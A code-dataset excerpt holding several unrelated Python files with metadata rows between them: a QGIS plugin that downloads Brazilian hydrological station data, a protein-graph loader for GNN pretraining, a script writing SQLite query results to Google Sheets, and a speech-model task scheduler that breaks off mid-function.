locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'HidrowebDownloader_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&Hidroweb Downloader')
# Check if plugin was started the first time in current QGIS session
# Must be set in initGui() to survive plugin reloads
self.first_start = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('HidrowebDownloader', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
# Adds plugin icon to Plugins toolbar
self.iface.addToolBarIcon(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/hidroweb_downloader/icon.png'
self.add_action(
icon_path,
text=self.tr(u'Download hydrological data from Hidroweb'),
callback=self.run,
parent=self.iface.mainWindow())
# will be set False in run()
self.first_start = True
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
self.tr(u'&Hidroweb Downloader'),
action)
self.iface.removeToolBarIcon(action)
def run(self):
"""Run method that performs all the real work"""
# Create the dialog with elements (after translation) and keep reference
# Only create GUI ONCE in callback, so that it will only load when the plugin is started
if self.first_start == True:
self.first_start = False
self.dlg = HidrowebDownloaderDialog()
self.dlg.download_button.clicked.connect(self.polygon_station)
self.dlg.inventarioDownload_button.clicked.connect(self.inventario)
# show the dialog
self.dlg.show()
# Run the dialog event loop
result = self.dlg.exec_()
# See if OK was pressed
if result:
# Do something useful here - delete the line containing pass and
# substitute with your code.
# print('ok')
print(self.dlg.file_widget.filePath())
def polygon_station(self):
error = self.check_errors()
if error:
print('Error')
# sys.exit()
else:
layer_input = self.dlg.mapLayer_box.currentLayer()
print(layer_input)
feat = layer_input.getFeatures()
for l in feat:
feat_geometry = l.geometry()
if self.dlg.buffer_spinbox.value() == 0:
pass
else:
feat_geometry = self.create_buffer_polygon(feat_geometry=feat_geometry, distance=self.dlg.buffer_spinbox.value(), segments=5)
with open(self.dlg.inventario_path.filePath(), encoding='utf8') as csvfile:
total = len(list(csv.DictReader(csvfile)))
print(total)
with open(self.dlg.inventario_path.filePath(), encoding='utf8') as csvfile:
data = csv.DictReader(csvfile)
i = 0
for row in data:
i += 1
# print(row)
self.dlg.progressBar.setValue(i/float(total)*100)
if feat_geometry.contains(QgsPointXY(float(row['Longitude']), float(row['Latitude']))):
print('aqui')
print(row['TipoEstacao'])
if (self.dlg.rain_checkbox.isChecked()) and (not self.dlg.flow_checkbox.isChecked()) and (int(row['TipoEstacao'])==2):
print('rain checkbox')
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
elif (self.dlg.flow_checkbox.isChecked()) and (not self.dlg.rain_checkbox.isChecked()) and (int(row['TipoEstacao'])==1):
print('flow checkbox')
print(row['Codigo'])
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
elif (self.dlg.rain_checkbox.isChecked()) and (self.dlg.flow_checkbox.isChecked()):
print('both rain and flow checkbox')
self.point_station(codigo=row['Codigo'],
tipoEstacao=row['TipoEstacao'],
lon=row['Longitude'],
lat=row['Latitude'])
else:
print('Nada selecionado')
# print(self.dlg.inventario_path.filePath()[:-3])
self.iface.messageBar().pushMessage('Success', 'Programa finalizado!', level=Qgis.Success)
def point_station(self, codigo, tipoEstacao, lon, lat):
layers = list(QgsProject.instance().mapLayers().values())
layers_name = [l.name() for l in layers]
s = self.download_station(code=codigo,
typeData=tipoEstacao,
folder_toDownload=f'{self.dlg.data_folder.filePath()}',
lon=lon, lat=lat)
if (not f'{codigo}_{tipoEstacao}' in layers_name) and (s[0]):
lyr = QgsVectorLayer("point?crs=epsg:4326&field=id:integer", f"{codigo}_{tipoEstacao}", "memory")
QgsProject.instance().addMapLayer(lyr)
target_layer = QgsProject.instance().mapLayersByName(f'{codigo}_{tipoEstacao}')
target_layer[0].startEditing()
l_d = target_layer[0].dataProvider()
feat = QgsFeature(target_layer[0].fields())
feat.setGeometry(QgsPoint(float(lon), float(lat)))
if int(tipoEstacao) == 1:
l_d.addAttributes([QgsField('Date', QVariant.Date), QgsField('Consistencia', QVariant.Int), QgsField('Vazao',QVariant.Double)])
for i, (date, consis, data) in enumerate(zip(s[1], s[2], s[3])):
feat.setAttributes([i, date.strftime('%Y-%m-%d'),consis,data])
l_d.addFeatures([feat])
elif int(tipoEstacao) == 2:
l_d.addAttributes([QgsField('Date', QVariant.Date), QgsField('Consistencia', QVariant.Int), QgsField('Chuva',QVariant.Double)])
for i, (date, consis, data) in enumerate(zip(s[1], s[2], s[3])):
feat.setAttributes([i, date.strftime('%Y-%m-%d'),consis,data])
l_d.addFeatures([feat])
target_layer[0].updateExtents()
target_layer[0].commitChanges()
else:
pass
def download_station(self, code, typeData, folder_toDownload, lon, lat):
if int(typeData) == 1:
typeData = '3'
else:
pass
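# ANA 'tipoDados' convention: '3' = vazao (flow), '2' = chuva (rainfall); the
# station inventory marks flow stations as TipoEstacao 1, hence the remapping above.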
params = {'codEstacao': f'{int(code):08}', 'dataInicio': '', 'dataFim': '', 'tipoDados': '{}'.format(typeData), 'nivelConsistencia': ''}
response = requests.get(r'http://telemetriaws1.ana.gov.br/ServiceANA.asmx/HidroSerieHistorica', params)
# response = requests.get(r'http://telemetriaws1.ana.gov.br/ServiceANA.asmx?op=HidroSerieHistorica', params)
# print(code,response.status_code)
tree = ET.ElementTree(ET.fromstring(response.content))
root = tree.getroot()
list_data = []
list_consistenciaF = []
list_month_dates = []
lon = float(lon)
lat = float(lat)
for i in root.iter('SerieHistorica'):
codigo = i.find("EstacaoCodigo").text
consistencia = i.find("NivelConsistencia").text
date = i.find("DataHora").text
date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S')
last_day = calendar.monthrange(date.year, date.month)[1]
month_dates = [date + datetime.timedelta(days=i) for i in range(last_day)]
data = []
list_consistencia = []
for day in range(last_day):
if params['tipoDados'] == '3':
value = 'Vazao{:02}'.format(day+1)
try:
data.append(float(i.find(value).text))
list_consistencia.append(int(consistencia))
except TypeError:
data.append(i.find(value).text)
list_consistencia.append(int(consistencia))
except AttributeError:
data.append(None)
list_consistencia.append(int(consistencia))
if params['tipoDados'] == '2':
value = 'Chuva{:02}'.format(day+1)
try:
data.append(float(i.find(value).text))
list_consistencia.append(consistencia)
except TypeError:
data.append(i.find(value).text)
list_consistencia.append(consistencia)
except AttributeError:
data.append(None)
list_consistencia.append(consistencia)
list_data = list_data + data
list_consistenciaF = list_consistenciaF + list_consistencia
list_month_dates = list_month_dates + month_dates
if len(list_data) > 0:
rows = zip(list_month_dates,[lon for l in range(len(list_month_dates))],[lat for l in range(len(list_month_dates))], list_consistenciaF, list_data)
with open(os.path.join(folder_toDownload, f'{codigo}_{typeData}.csv'), 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(('Date','Longitude','Latitude', f'Consistencia_{codigo}_{typeData}', f'Data_{codigo}_{typeData}'))
for row in rows:
writer.writerow(row)
print('CSV gerado')
return (True, list_month_dates, list_consistenciaF, list_data)
else:
print('Dado insuficiente')
return (False, list_month_dates, list_consistenciaF, list_data)
def create_buffer_polygon(self, feat_geometry, distance, segments):
layers = list(QgsProject.instance().mapLayers().values())
layers_name = [l.name() for l in layers]
if not 'buffer_polygon' in layers_name:
lyr = QgsVectorLayer("polygon?crs=epsg:4326&field=id:integer", f"buffer_polygon", "memory")
QgsProject.instance().addMapLayer(lyr)
target_layer = QgsProject.instance().mapLayersByName('buffer_polygon')
target_layer[0].startEditing()
l_d = target_layer[0].dataProvider()
# feats = target_layer[0].getFeatures()
# for feat in feats:
# geom = feat.geometry()
feat = QgsFeature(target_layer[0].fields())
feat.setGeometry(feat_geometry.buffer(distance, segments))
l_d.addFeature(feat)
target_layer[0].updateExtents()
target_layer[0].commitChanges()
f = target_layer[0].getFeatures()
for l in f:
l_geometry = l.geometry()
return l_geometry
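# Note: the memory layer above uses EPSG:4326, so the buffer distance is
# interpreted in degrees rather than metres.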
def inventario(self):
api_inventario = 'http://telemetriaws1.ana.gov.br/ServiceANA.asmx/HidroInventario'
params = {'codEstDE':'','codEstATE':'','tpEst':'','nmEst':'','nmRio':'','codSubBacia':'',
'codBacia':'','nmMunicipio':'','nmEstado':'','sgResp':'','sgOper':'','telemetrica':''}
self.dlg.progressBar_inventario.setValue(2)
response = requests.get(api_inventario, params)
self.dlg.progressBar_inventario.setValue(10)
tree = ET.ElementTree(ET.fromstring(response.content))
root = tree.getroot()
self.dlg.progressBar_inventario.setValue(15)
if os.path.isfile(os.path.join(self.dlg.file_widget.filePath(), f'inventario.csv')):
print('Arquivo inventario já existe')
self.dlg.progressBar_inventario.setValue(100)
else:
with open(os.path.join(self.dlg.file_widget.filePath(), f'inventario.csv'), 'w',newline='') as f:
writer = csv.writer(f)
writer.writerow(('Codigo', 'Latitude','Longitude','TipoEstacao'))
self.dlg.progressBar_inventario.setValue(20)
# print(len(root.findall('Codigo')))
total = len(list(root.iter('Table')))
j = 0
self.dlg.progressBar_inventario.setValue(25)
for i in root.iter('Table'):
print(i.find('Codigo').text, i.find('Latitude').text, i.find('Longitude').text, i.find('TipoEstacao').text)
writer.writerow((i.find('Codigo').text, i.find('Latitude').text, i.find('Longitude').text, i.find('TipoEstacao').text))
j+=1
# self.dlg.progressBar_inventario.setValue(j/float(total)*100)
self.dlg.progressBar_inventario.setValue(100)
print('Arquivo inventario.csv criado')
self.dlg.inventario_path.setFilePath(os.path.join(self.dlg.file_widget.filePath(), 'inventario.csv'))
self.iface.messageBar().pushMessage('Success', 'Download do inventario.csv concluído!', level=Qgis.Success)
def check_errors(self):
error = False
print(self.dlg.inventario_path.filePath()[-4:])
if (self.dlg.inventario_path.filePath() == None) or (self.dlg.inventario_path.filePath()=='') or (not self.dlg.inventario_path.filePath()[-4:]=='.csv'):
print(self.dlg.inventario_path.filePath())
self.iface.messageBar().pushMessage("Error", "inventario.csv não encontrado", level=Qgis.Critical, duration=5)
error = True
if self.dlg.mapLayer_box.currentLayer() == None:
self.iface.messageBar().pushMessage("Error", "Shapefile (Polígono) não encontrado", level=Qgis.Critical, duration=5)
error = True
# elif ensures .crs() is not called when no layer is selected above
elif (not self.dlg.mapLayer_box.currentLayer().crs().authid()=='EPSG:4674') and (not self.dlg.mapLayer_box.currentLayer().crs().authid()=='EPSG:4326'):
self.iface.messageBar().pushMessage("Error", "Shapefile (Polígono) com Sistema de Coordenadas incorreto. O correto é Sirgas2000 ou WGS84.", level=Qgis.Critical, duration=5)
error = True
if (self.dlg.data_folder.filePath() == None) or (self.dlg.data_folder.filePath() == ''):
self.iface.messageBar().pushMessage("Error", "Nenhuma pasta selecionada para o download", level=Qgis.Critical, duration=5)
error = True
return error
| 44.127983 | 184 | 0.563683 | 2,168 | 20,343 | 5.193727 | 0.232472 | 0.02611 | 0.012789 | 0.016785 | 0.400178 | 0.330284 | 0.278952 | 0.249378 | 0.232948 | 0.205062 | 0 | 0.00844 | 0.312737 | 20,343 | 460 | 185 | 44.223913 | 0.796939 | 0.211178 | 0 | 0.283688 | 0 | 0 | 0.112402 | 0.020042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0.010638 | 0.035461 | 0 | 0.102837 | 0.067376 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85f53c1b7be763529623bee7f828aec71c096d6 | 8,700 | py | Python | bio/loader.py | selincetin/pretrain-gnns | 8ac7768f77bd74351c5f489a64b4390fdadfc4f9 | [
"MIT"
] | 590 | 2020-02-09T21:43:11.000Z | 2022-03-26T05:57:18.000Z | bio/loader.py | SuperXiang/pretrain-gnns | 7bb81b5cc2d37241ee72cbfa40fbd89b0cc2394f | [
"MIT"
] | 48 | 2020-02-22T21:33:45.000Z | 2022-03-06T18:53:43.000Z | bio/loader.py | SuperXiang/pretrain-gnns | 7bb81b5cc2d37241ee72cbfa40fbd89b0cc2394f | [
"MIT"
] | 133 | 2020-02-02T07:21:09.000Z | 2022-03-24T06:07:14.000Z | import os
import torch
import random
import networkx as nx
import pandas as pd
import numpy as np
from torch.utils import data
from torch_geometric.data import Data
from torch_geometric.data import InMemoryDataset
from torch_geometric.data import Batch
from itertools import repeat, product, chain
from collections import Counter, deque
from networkx.algorithms.traversal.breadth_first_search import generic_bfs_edges
def nx_to_graph_data_obj(g, center_id, allowable_features_downstream=None,
allowable_features_pretrain=None,
node_id_to_go_labels=None):
"""
Converts nx graph of PPI to pytorch geometric Data object.
:param g: nx graph object of ego graph
:param center_id: node id of center node in the ego graph
:param allowable_features_downstream: list of possible go function node
features for the downstream task. The resulting go_target_downstream node
feature vector will be in this order.
:param allowable_features_pretrain: list of possible go function node
features for the pretraining task. The resulting go_target_pretrain node
feature vector will be in this order.
:param node_id_to_go_labels: dict that maps node id to a list of its
corresponding go labels
:return: pytorch geometric Data object with the following attributes:
edge_attr
edge_index
x
species_id
center_node_idx
go_target_downstream (only if node_id_to_go_labels is not None)
go_target_pretrain (only if node_id_to_go_labels is not None)
"""
n_nodes = g.number_of_nodes()
n_edges = g.number_of_edges()
# nodes
nx_node_ids = [n_i for n_i in g.nodes()] # contains list of nx node ids
# in a particular ordering. Will be used as a mapping to convert
# between nx node ids and data obj node indices
x = torch.tensor(np.ones(n_nodes).reshape(-1, 1), dtype=torch.float)
# we don't have any node labels, so set to dummy 1. dim n_nodes x 1
center_node_idx = nx_node_ids.index(center_id)
center_node_idx = torch.tensor([center_node_idx], dtype=torch.long)
# edges
edges_list = []
edge_features_list = []
for node_1, node_2, attr_dict in g.edges(data=True):
edge_feature = [attr_dict['w1'], attr_dict['w2'], attr_dict['w3'],
attr_dict['w4'], attr_dict['w5'], attr_dict['w6'],
attr_dict['w7'], 0, 0] # last 2 indicate self-loop
# and masking
edge_feature = np.array(edge_feature, dtype=int)
# convert nx node ids to data obj node index
i = nx_node_ids.index(node_1)
j = nx_node_ids.index(node_2)
edges_list.append((i, j))
edge_features_list.append(edge_feature)
edges_list.append((j, i))
edge_features_list.append(edge_feature)
# data.edge_index: Graph connectivity in COO format with shape [2, num_edges]
edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long)
# data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]
edge_attr = torch.tensor(np.array(edge_features_list),
dtype=torch.float)
try:
species_id = int(nx_node_ids[0].split('.')[0]) # nx node id is of the form:
# species_id.protein_id
species_id = torch.tensor([species_id], dtype=torch.long)
except (AttributeError, ValueError): # occurs when nx node id has no species id info. For the extract
# substructure context pair transform, where we convert a data obj to
# a nx graph obj (which does not have original node id info)
species_id = torch.tensor([0], dtype=torch.long) # dummy species
# id is 0
# construct data obj
data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)
data.species_id = species_id
data.center_node_idx = center_node_idx
if node_id_to_go_labels: # supervised case with go node labels
# Construct a dim n_pretrain_go_classes tensor and a
# n_downstream_go_classes tensor for the center node. 0 is no data
# or negative, 1 is positive.
downstream_go_node_feature = [0] * len(allowable_features_downstream)
pretrain_go_node_feature = [0] * len(allowable_features_pretrain)
if center_id in node_id_to_go_labels:
go_labels = node_id_to_go_labels[center_id]
# get indices of allowable_features_downstream that match with elements
# in go_labels
_, node_feature_indices, _ = np.intersect1d(
allowable_features_downstream, go_labels, return_indices=True)
for idx in node_feature_indices:
downstream_go_node_feature[idx] = 1
# get indices of allowable_features_pretrain that match with
# elements in go_labels
_, node_feature_indices, _ = np.intersect1d(
allowable_features_pretrain, go_labels, return_indices=True)
for idx in node_feature_indices:
pretrain_go_node_feature[idx] = 1
data.go_target_downstream = torch.tensor(np.array(downstream_go_node_feature),
dtype=torch.long)
data.go_target_pretrain = torch.tensor(np.array(pretrain_go_node_feature),
dtype=torch.long)
return data
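# Usage sketch (illustrative):
#   data = nx_to_graph_data_obj(ego_g, center_id)  # ego_g: nx ego graph of a PPI network
#   data.x           -> dummy node features of shape [n_nodes, 1]
#   data.edge_index  -> shape [2, 2 * n_edges]; each edge is stored in both directions
#   data.edge_attr   -> 9-dim edge features (7 interaction weights + self-loop/mask flags)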
def graph_data_obj_to_nx(data):
"""
Converts pytorch geometric Data obj to network x data object.
:param data: pytorch geometric Data object
:return: nx graph object
"""
G = nx.Graph()
# edges
edge_index = data.edge_index.cpu().numpy()
edge_attr = data.edge_attr.cpu().numpy()
n_edges = edge_index.shape[1]
for j in range(0, n_edges, 2):
begin_idx = int(edge_index[0, j])
end_idx = int(edge_index[1, j])
w1, w2, w3, w4, w5, w6, w7, _, _ = edge_attr[j].astype(bool)
if not G.has_edge(begin_idx, end_idx):
G.add_edge(begin_idx, end_idx, w1=w1, w2=w2, w3=w3, w4=w4, w5=w5,
w6=w6, w7=w7)
# # add center node id information in final nx graph object
# nx.set_node_attributes(G, {data.center_node_idx.item(): True}, 'is_centre')
return G
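# Note: this data -> nx round trip keeps only the boolean edge weights; the
# original string node ids (and hence species ids) and the centre-node index
# are not preserved, which is why nx_to_graph_data_obj falls back to a dummy
# species id for such graphs.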
class BioDataset(InMemoryDataset):
def __init__(self,
root,
data_type,
empty=False,
transform=None,
pre_transform=None,
pre_filter=None):
"""
Adapted from qm9.py. Disabled the download functionality
:param root: the data directory that contains a raw and processed dir
:param data_type: either supervised or unsupervised
:param empty: if True, then will not load any data obj. For
initializing empty dataset
:param transform:
:param pre_transform:
:param pre_filter:
"""
self.root = root
self.data_type = data_type
super(BioDataset, self).__init__(root, transform, pre_transform, pre_filter)
if not empty:
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
#raise NotImplementedError('Data is assumed to be processed')
if self.data_type == 'supervised': # 8 labelled species
file_name_list = ['3702', '6239', '511145', '7227', '9606', '10090', '4932', '7955']
else: # unsupervised: 8 labelled species, and 42 top unlabelled species by n_nodes.
file_name_list = ['3702', '6239', '511145', '7227', '9606', '10090',
'4932', '7955', '3694', '39947', '10116', '443255', '9913', '13616',
'3847', '4577', '8364', '9823', '9615', '9544', '9796', '3055', '7159',
'9031', '7739', '395019', '88036', '9685', '9258', '9598', '485913',
'44689', '9593', '7897', '31033', '749414', '59729', '536227', '4081',
'8090', '9601', '749927', '13735', '448385', '457427', '3711', '479433',
'479432', '28377', '9646']
return file_name_list
@property
def processed_file_names(self):
return 'geometric_data_processed.pt'
def download(self):
raise NotImplementedError('Must indicate valid location of raw data. '
'No download allowed')
def process(self):
raise NotImplementedError('Data is assumed to be processed')
if __name__ == "__main__":
root_supervised = 'dataset/supervised'
d_supervised = BioDataset(root_supervised, data_type='supervised')
print(d_supervised)
root_unsupervised = 'dataset/unsupervised'
d_unsupervised = BioDataset(root_unsupervised, data_type='unsupervised')
print(d_unsupervised)
| 41.037736 | 96 | 0.651724 | 1,194 | 8,700 | 4.511725 | 0.242044 | 0.014479 | 0.01188 | 0.012994 | 0.235753 | 0.179321 | 0.153703 | 0.128086 | 0.128086 | 0.098014 | 0 | 0.051147 | 0.258391 | 8,700 | 211 | 97 | 41.232227 | 0.783788 | 0.308506 | 0 | 0.084746 | 0 | 0 | 0.082715 | 0.004662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0 | 0.110169 | 0.008475 | 0.211864 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a86b28ee1225866b03b3cc3e943f5eb90224441d | 2,857 | py | Python | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | query_output_to_gs.py | kburchfiel/google_sheets_database_connections | b60c49bbead9ddd6322b0b65e2cbfd3685188f21 | [
"MIT"
] | null | null | null | # Query Output to Google Slides
# Kenneth Burchfiel
# Program is released under the MIT License
'''This program shows how to upload the results of database queries to a Google
Sheets file. The program uses a sample SQLite database containing fictional
test score data; however, you can also connect to an online database using
SQLAlchemy. See my Python Database Utilities repository (available at
https://github.com/kburchfiel/python_database_utilities) for examples.'''
'''More documentation will be provided in the future. I will probably also
convert the .py file to an .ipynb file for easier readability.'''
import sqlite3
import pandas as pd
import getpass
import gspread
from gspread_dataframe import set_with_dataframe
import time
con = sqlite3.connect('test_scores.db') # I initialized 'test_scores.db' simply by creating an empty file in my folder and giving it that name.
df_scores = pd.read_excel('scores_by_program_enrollment.xlsx') # This idea for importing a spreadsheet into a database came from Stack Overflow user Tennessee Leeuwenburg (see https://stackoverflow.com/a/28802613/13097194).
print(df_scores)
df_scores.to_sql('Scores', con = con, if_exists = 'replace') # See https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_sql.html
cur = con.cursor()
gc = gspread.service_account(pd.read_csv('..\\key_paths\\key_paths.csv').iloc[0,1])
query_list = []
query_list.append("Select * from Scores limit 5")
query_list.append("Select Student_ID, School, Grade from Scores limit 50")
query_dict_list = []
for i in range(len(query_list)):
query_dict_list.append({"query_id":"Query_"+str(i),"query_text":query_list[i]})
results_workbook = gc.open_by_key('1jPPz4YW5v5repoJXpXXJ3VrivK21lv1VYLvQIvTEyxE')
df_query_index = pd.DataFrame(query_dict_list)
print(df_query_index)
query_index_sheet = results_workbook.get_worksheet(0)
query_index_sheet.clear()
query_index_sheet_title = 'query_index'
query_index_sheet.update_title(query_index_sheet_title)
set_with_dataframe(query_index_sheet, df_query_index, include_index = True)
for i in range(len(query_list)):
start_time = time.time()
print("Now on Query",i)
df_query = pd.read_sql(sql = query_list[i], con = con) # This was a method I had originally learned about when converting database content accessed through pyodbc to Pandas DataFrames. It works with sqlite3 databases also.
# print(df_query) # Helpful for debugging
query_sheet = results_workbook.get_worksheet(i+1) # A +1 offset is used because sheet 0 contains the index list.
query_sheet.clear()
query_sheet_title = 'Query_'+str(i)
query_sheet.update_title(query_sheet_title)
set_with_dataframe(query_sheet, df_query, include_index = True)
end_time = time.time()
length = end_time - start_time
print("Time operation took (in seconds):",'{:.3f}'.format(length))
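# Notes (illustrative assumptions): the service-account JSON referenced in
# key_paths.csv must have access to the target spreadsheet (share the sheet with
# the service account's email), and the workbook opened above is assumed to
# already contain len(query_list) + 1 worksheets, since get_worksheet(i + 1)
# retrieves existing sheets rather than creating new ones.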
| 40.814286 | 226 | 0.777039 | 439 | 2,857 | 4.851936 | 0.439636 | 0.046948 | 0.042254 | 0.019718 | 0.101878 | 0.050704 | 0.021596 | 0 | 0 | 0 | 0 | 0.014901 | 0.130907 | 2,857 | 69 | 227 | 41.405797 | 0.842932 | 0.370669 | 0 | 0.052632 | 0 | 0 | 0.185749 | 0.063946 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.026316 | 0.157895 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a86f96505462e383f6c2341faddf2a1e85c4c268 | 9,562 | py | Python | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | fwks/tasks.py | Zantyr/fwks | 4dee4d406fcab4eb375afe6c9a08206fb58af061 | [
"MIT"
] | null | null | null | """
fwks.tasks
==========
Module responsible for scheduling the computations. Each type of task may be configured and then run in sequence.
Useful for creation of batches of jobs.
"""
__all__ = ["Task", "make_training_task", "make_ab_feature_test", "make_feature_learnability"]
import keras
import numpy as np
import os
import fwks.model as model
import fwks.dataset as dataset
import fwks.metricization as metricization
from fwks.miscellanea import StopOnConvergence
"""
TODO:
- saving // loading
- running the network
- creation of chains for language models
- test coverage
"""
class Task(type):
"""
Metaclass registering and running tasks.
"""
_instances = {}
@classmethod
def all(cls):
return [cls._instances[x] for x in sorted(cls._instances.keys())]
def __new__(self, name, bases, dct):
new_dct = {"name": name, "implemented": True}
new_dct.update(dct)
item = super().__new__(self, name, bases, new_dct)
self._instances[name] = item
return item
def make_training_task(
noise=None,
evaluation_metrics=None,
evaluation_selection=None,
):
"""
Factory of basic model training tasks
"""
# TODO: add training using noisy instead of clean
_evaluation_selection = evaluation_selection
class AbstractModelTraining(Task):
how_much = 9000
noise_gen = noise
epochs = 250
from_path = "datasets/clarin-long/data"
metrics = evaluation_metrics or []
evaluation_selection = _evaluation_selection
def __new__(self, name, bases, dct):
this = self
_metrics = self.metrics
_evaluation_selection = self.evaluation_selection
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
return os.path.exists(os.path.join(cache, "model.zip"))
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except OSError:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_acoustic_model()
am.num_epochs = this.epochs
am.name = name
am.build(dset)
am.summary()
if self._metrics:
metric_obj = metricization.TrainedModelMetricization(am, self._metrics)
results = metric_obj.on_dataset(dset, partial=self._evaluation_selection)
results.summary()
am.save(os.path.join(cache, "model.zip"), save_full=True)
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
try:
print(cache)
am = model.AcousticModel.load(os.path.join(cache, "model.zip"))
return am.summary(show=show)
except FileNotFoundError:
print("Cannot find the model archive - aborting")
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset,
"_metrics": _metrics, "_evaluation_selection": _evaluation_selection}
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
@classmethod
def add_metric(self, metric):
self.metrics.append(metric)
metaclass = AbstractModelTraining
return metaclass
AbstractModelTraining = make_training_task()
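# Minimal usage sketch (hypothetical names, not part of the module): a concrete
# training task is declared with the returned metaclass and must supply
# get_acoustic_model, which run() calls via self.get_acoustic_model().
#
# class MyTraining(metaclass=AbstractModelTraining):
#     @classmethod
#     def get_acoustic_model(cls):
#         return model.AcousticModel(...)  # constructor arguments assumed
#
# Task.all() then returns every registered task class, e.g. for batch runs:
# for task in Task.all():
#     task.run("cache")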
def make_ab_feature_test(noise_gen):
"""
Factory for tasks that compare feature transforms on clean and noisy recordings
"""
_noise_gen = noise_gen
class AbstractABTraining(Task):
how_much = 9000
noise_gen = _noise_gen
from_path = "datasets/clarin-long/data"
def __new__(self, name, bases, dct):
this = self
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
pass
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except OSError:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_acoustic_model()
mapping_generator = model.MappingGenerator(am.stages)
mapping = mapping_generator.get(dset)
dset.generate(mapping, ["clean", "noisy"])
print("Shape of the data: {}".format(dset.clean.shape))
metric_obj = metricization.MetricizationAB([
metricization.CosineMetric(),
metricization.EuclidMetric(),
metricization.ManhattanMetric()
])
diff = (dset.clean - dset.noisy)
metric_obj.calculate(
dset.clean, dset.clean_lens,
dset.noisy, dset.noisy_lens
)
metric_obj.summary()
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
